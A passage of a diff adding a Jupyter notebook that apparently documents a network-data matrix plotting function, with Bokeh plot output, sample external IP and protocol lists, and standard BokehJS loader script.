5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88],\"plt_size\":{\"__ndarray__\":\"AAAAAAAAAAAsckyh9HEXQCzphSLhs/A/+/58coOoFkAs6YUi4bPwP52vecUPXxZARY2S/hS+C0BFjZL+FL4LQEWNkv4UvgtArZhPbSRkA0As6YUi4bPwP0WNkv4UvgtALOmFIuGz8D+dr3nFD18WQCzphSLhs/A/LOmFIuGz8D924zw8XpAYQNXtttamrxdAAAAAAAAAAACdr3nFD18WQEWNkv4UvgtARY2S/hS+C0BFjZL+FL4LQCxyTKH0cQdAUReFyht5+j9ymW618RccQDzVhQYJSRRAPoCFdn6WBUCXefYlThAVQG7OUqInuyJAAAAAAAAAJEA+gIV2fpYFQMHdyLPRDQlALOmFIuGz8D8s6YUi4bMAQCzphSLhswBALOmFIuGzAEAs6YUi4bMAQAGoFeRfERFArZhPbSRkA0Asckyh9HEHQCzphSLhs/A/AAAAAAAAAADB3ciz0Q0JQCzphSLhs/A/rZhPbSRkA0DUdMgHb/ANQCzphSLhs/A/PoCFdn6WBUAGsfGlv8AVQFEXhcobeQpAAAAAAAAAAADUdMgHb/ANQK2YT20kZANArZhPbSRkA0DCZo8y5csPQCzphSLhswBA052LDueMHUAs6YUi4bPwP7W0hcwvJRNAzkQeZcpGHUBjcYsO6LwRQEWNkv4UvgtAtbSFzC8lE0As6YUi4bPwP62YT20kZANAdozqcVF9FEBjcYsO6LwRQFEXhcobefo/UReFyht5+j8AAAAAAAAAAEWNkv4UvgtAKxJJKVlQEECtmE9tJGQDQFEXhcobeQpAAAAAAAAAAABRF4XKG3n6P85EHmXKRh1AFNdfrtW/IEAOrvZ7/54SQCxyTKH0cQdAUReFyht5CkBRF4XKG3kKQPMF5C2GaRFA5XgXejawHEAs6YUi4bPwPwAAAAAAAAAAAAAAAAAAAADzBeQthmkRQA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[89]},\"size\":{\"__ndarray__\":\"AAAAAAAAAABXWjKuciIPQO85+v5CLuY/EewUFvAWDkDvOfr+Qi7mP06sjkVltQ1AFlW1u7FrAkAWVbW7sWsCQBZVtbuxawJAM43t90HA+T/vOfr+Qi7mPxZVtbuxawJA7zn6/kIu5j9OrI5FZbUNQO85+v5CLuY/7zn6/kIu5j95Kcf5ZU8QQP8AUf9gdA9AAAAAAAAAAABOrI5FZbUNQBZVtbuxawJAFlW1u7FrAkAWVbW7sWsCQFdaMq5yIv8/CwOteuqT8T+TZfCTXKcSQB/+zcs48ApAAiAq+gur/D/RuNX02PgLQCDps7XY3xhAjyRPnDuPGkACICr6C6v8P3OrOz+yogBA7zn6/kIu5j/vOfr+Qi72P+85+v5CLvY/7zn6/kIu9j/vOfr+Qi72P3p/+sFrqgZAM43t90HA+T9XWjKuciL/P+85+v5CLuY/AAAAAAAAAABzqzs/sqIAQO85+v5CLuY/M43t90HA+T99ntO8FuEDQO85+v5CLuY/AiAq+gur/D+9xzruKOMMQAsDrXrqkwFAAAAAAAAAAAB9ntO8FuEDQDON7fdBwPk/M43t90HA+T+nu9cWyhwFQO85+v5CLvY/lSX9WQCfE0DvOfr+Qi7mP/ksknynbAlAy7a1qXJwE0AsswQGNo4HQBZVtbuxawJA+SySfKdsCUDvOfr+Qi7mPzON7fdBwPk/m9YL+aY1C0AsswQGNo4HQAsDrXrqk/E/CwOteuqT8T8AAAAAAAAAABZVtbuxawJAH0hNORaqBUAzje33QcD5PwsDrXrqkwFAAAAAAAAAAAALA6166pPxP8u2talycBNA8bdSUyM+FkDIxT13dLoIQFdaMq5yIv8/CwOteuqTAUALA6166pMBQIaRazp7HwdArkfvUncME0DvOfr+Qi7mPwAAAAAAAAAAAAAAAAAAAACGkWs6ex8HQA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[89]}},\"selected\":{\"id\":\"2057\"},\"selection_policy\":{\"id\":\"2058\"}},\"id\":\"2013\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"factors\":[\"ftp\",\"http\",\"https\",\"microsoft-ds\",\"ms-wbt-server\",\"ntp\",\"ssh\"]},\"id\":\"2017\",\"type\":\"FactorRange\"},{\"attributes\":{},\"id\":\"2031\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"2035\",\"type\":\"SaveTool\"},{\"attributes\":{\"source\":{\"id\":\"2013\"}},\"id\":\"2049\",\"type\":\"CDSView\"},{\"attributes\":{\"overlay\":{\"id\":\"2036\"}},\"id\":\"2032\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"2033\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"2057\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"2034\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"2023\",\"type\":\"CategoricalScale\"},{\"attributes\":{},\"id\":\"2054\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"2051\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"2055\",\"type\":\"CategoricalTickFormatter\"},{\"attributes\":{\"factors\":[\"99.84.106.92\",\"99.84.106.27\",\"99.84.106.178\",\"99.84.104.63\",\"90.130.70.73\",\"8.253.45.249\",\"8.249.241.254\",\"72.21.91.29\",\"72.21.81.240\",\"72.21.81.200\",\"65.55.44.109\",\"65.55.44.108\",\"65.55.252.190\",\"65.55.163.80\",\"65.55.163.78\",\"65.55.163.76\",\"65.52.108.92\",\"52.239.152.10\",\"52.183.114.173\",\"52.179.17.38\",\"52.173.28.179\",\"52.173.26.181\",\"52.168.138.145\",\"52.165.175.144\",\"52.165.170.112\",\"46.43.34.31\",\"40.91.75.5\",\"40.87.63.92\",\"40.85.232.64\",\"40.80.145.38\",\"40.79.85.125\",\"40.77.232.95\",\"40.77.228.69\",\"40.77.226.250\",\"40.69.153.67\",\"40.124.45.19\",\"40.121.3.131\",\"23.96.64.84\",\"23.48.36.78\",\"23.48.36.47\",\"23.47.27.169\",\"23.45.180.234\",\"23.45.180.121\",\"23.4.187.27\",\"23.3.13.146\",\"23.3.13.112\",\"23.3.13.106\",\"23.223.3.100\",\"216.58.218.238\",\"212.13.197.231\",\"205.185.216.42\",\"204.79.197.200\",\"20.42.24.50\",\"20.41.41.23\",\"20.38.98.100\",\"173.194.61.40\",\"172.217.8.3\",\"172.217.8.14\",\"172.217.15.99\",\"172.217.15.78\",\"172.217.15.110\",\"168.62.32.212\",\"157.55.135.128\",\"157.55.134.142\",\"157.55.134.136\",\"134.170.58.123\",\"131.107.147.209\",\"13.89.220.65\",\"13.89.187.212\",\"13.86.124.191\",\"13.83.149.5\",\"13.83.148.235\",\"13.83.148.218\",\"13.82.152.48\",\"13.74.179.117\",\"13.71.172.130\",\"13.71.172.128\",\"13.68.93.109\",\"13.68.226.108\",\"13.67.143.117\",\"13.65.107.32\",\"13.64.188.245\",\"13.107.4.50\",\"104.43.212.12\",\"104.211.30.1\",\"10.0.3.5\",\"10.0.3.4\"]},\"id\":\"2019\",\"type\":\"FactorRange\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"value\":\"red\"},\"line_color\":{\"value\":\"#1f77b4\"},\"size\":{\"field\":\"plt_size\"},\"x\":{\"field\":\"L7Protocol\"},\"y\":{\"field\":\"AllExtIPs\"}},\"id\":\"2046\",\"type\":\"Circle\"}],\"root_ids\":[\"2014\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = [{\"docid\":\"22d50b31-c79b-4864-9adf-7c465aaa663a\",\"root_ids\":[\"2014\"],\"roots\":{\"2014\":\"f17d5834-b56c-4f93-a485-07d2d7cacf5f\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);"
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "2014"
+      }
+     }
+    },
+    {
+     "output_type": "execute_result",
+     "data": {
+      "text/plain": [
+       "Figure(id='2014', ...)"
+      ],
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.plotting.figure.Figure\">Figure</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'2014', <span id=\"2111\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">above&nbsp;=&nbsp;[],</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_scale&nbsp;=&nbsp;1,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">below&nbsp;=&nbsp;[CategoricalAxis(id='2025', ...)],</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">center&nbsp;=&nbsp;[Grid(id='2027', ...), Grid(id='2030', ...)],</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_x_ranges&nbsp;=&nbsp;{},</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_y_ranges&nbsp;=&nbsp;{},</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_height&nbsp;=&nbsp;None,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_width&nbsp;=&nbsp;None,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;700,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">hidpi&nbsp;=&nbsp;True,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_height&nbsp;=&nbsp;0,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_width&nbsp;=&nbsp;0,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">left&nbsp;=&nbsp;[CategoricalAxis(id='2028', ...)],</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_factor&nbsp;=&nbsp;10,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_interval&nbsp;=&nbsp;300,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_threshold&nbsp;=&nbsp;2000,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_timeout&nbsp;=&nbsp;500,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">match_aspect&nbsp;=&nbsp;False,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border&nbsp;=&nbsp;5,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_bottom&nbsp;=&nbsp;None,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_left&nbsp;=&nbsp;None,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_right&nbsp;=&nbsp;None,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_top&nbsp;=&nbsp;None,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_height&nbsp;=&nbsp;0,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_width&nbsp;=&nbsp;0,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_cap&nbsp;=&nbsp;'butt',</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_color&nbsp;=&nbsp;None,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash&nbsp;=&nbsp;[],</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash_offset&nbsp;=&nbsp;0,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_join&nbsp;=&nbsp;'bevel',</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_width&nbsp;=&nbsp;1,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">output_backend&nbsp;=&nbsp;'canvas',</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">renderers&nbsp;=&nbsp;[GlyphRenderer(id='2048', ...)],</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">reset_policy&nbsp;=&nbsp;'standard',</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">right&nbsp;=&nbsp;[],</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">syncable&nbsp;=&nbsp;True,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title&nbsp;=&nbsp;Title(id='2015', ...),</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title_location&nbsp;=&nbsp;'above',</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar&nbsp;=&nbsp;Toolbar(id='2037', ...),</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_location&nbsp;=&nbsp;'above',</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_sticky&nbsp;=&nbsp;True,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;900,</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_range&nbsp;=&nbsp;FactorRange(id='2017', ...),</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_scale&nbsp;=&nbsp;CategoricalScale(id='2021', ...),</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_range&nbsp;=&nbsp;FactorRange(id='2019', ...),</div></div><div class=\"2110\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_scale&nbsp;=&nbsp;CategoricalScale(id='2023', ...))</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"2111\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"2110\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ]
+     },
+     "metadata": {},
+     "execution_count": 14
+    }
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "## Size based on number of distinct values\r\n",
+    "\r\n",
+    "Use the `dist_count` parameter with the `value_col` parameter\r\n",
+    "to display size based on number of distinct values in the value_col column.\r\n",
+    "\r\n",
+    "The plot below plots the circle size in proportion to the number\r\n",
+    "of distinct Layer 7 protocols used between the endpoints."
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 21,
+   "source": [
+    "net_df.mp_plot.matrix(\r\n",
+    "    x=\"SourceIP\",\r\n",
+    "    y=\"DestinationIP\",\r\n",
+    "    value_col=\"TotalAllowedFlows\",\r\n",
+    "    dist_count=True,\r\n",
+    "    title=\"External IP protocol flows (distinct protocols)\",\r\n",
+    "    sort=\"asc\",\r\n",
+    "    max_label_font_size=9,\r\n",
+    ")"
+   ],
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"2719\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"2719\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = 